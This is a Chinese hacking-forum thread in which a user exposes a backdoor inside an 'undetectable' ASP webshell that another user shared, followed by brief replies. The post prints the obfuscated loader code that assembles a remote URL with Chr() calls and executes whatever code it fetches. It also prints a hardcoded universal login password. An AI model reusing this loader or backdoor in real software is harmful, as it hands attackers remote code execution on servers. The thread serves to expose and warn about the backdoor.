这盐有点咸 发表于 2015-4-29 19:31:15

在我们论坛放后门?呵呵


刚刚逛论坛 ,一不小心发现 一个nb的帖子。 看名字挺唬人的,最新过狗asp木马,整体大小仅2KB,免杀全球。

暗自思衬十有八九是包含。既然只有2K ,绝笔是包含在人家服务器上的。这特么没后门 我直播剁手。


居然在大08放后门   吓尿 ,下载下来看看。


aspCode=PostHTTPPage(Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Chr ( 119 ) & Chr ( 119 ) & Chr ( 119 ) & Chr ( 46 ) & Chr ( 55 ) & Chr ( 106 ) & Chr ( 121 ) & Chr ( 101 ) & Chr ( 119 ) & Chr ( 117 ) & Chr ( 46 ) & Chr ( 99 ) & Chr ( 110 ) & Chr ( 47 ) & Chr ( 105 ) & Chr ( 109 ) & Chr ( 103 ) & Chr ( 47 ) & Chr ( 49 ) & Chr ( 46 ) & Chr ( 106 ) & Chr ( 112 ) & Chr ( 103 ))
Session("aspCode") =aspCode
End if
execute aspCode

显然这就是包含的内容

<?php
$a=chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(55).chr(106).chr(121).chr(101).chr(119).chr(117).chr(46).chr(99).chr(110).chr(47).chr(105).chr(109).chr(103).chr(47).chr(49).chr(46).chr(106).chr(112).chr(103 );
echo $a;
?>

我们echo一下 他是什么鬼



我们打开 http://www.7jyewu.cn/img/1.jpg

图片不显示,不显示就对了。显示才出了鬼。他是个asp的大马



嗯 没错 这就是那个sb后门

按照尿性 必有万能密码

if session("KKK")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass or request.form("pass")="1a2s3d" then
session("KKK")=UserPass


不错这个马用1a2s3d 也能登进去

不说了管理删帖去把。

08sec-君子 发表于 2015-4-29 21:04:50

0.0好带进还08 08 08....醉了

nextdoor 发表于 2015-4-29 21:44:02

被爆菊了:lol

skysay 发表于 2015-4-30 09:33:19

很牛掰的样子

H.U.C-Star 发表于 2015-4-30 14:22:46

很经典,好像学习怎么判断后门,ip雷达看哪里就知道有无后门?

verli 发表于 2015-5-1 20:10:05

= =。我居然发现我下载了,表示自己从没拿来用。

灵少 发表于 2015-5-3 03:04:27

支持原创

csadsl 发表于 2015-5-6 10:56:22

分析的很给力啊:(

节奏 发表于 2015-5-7 06:12:38

晕死了,玩闹 呢吧

moguyoudu 发表于 2015-5-10 22:09:08

膜拜大神
页: [1] 2
查看完整版本: 在我们论坛放后门?呵呵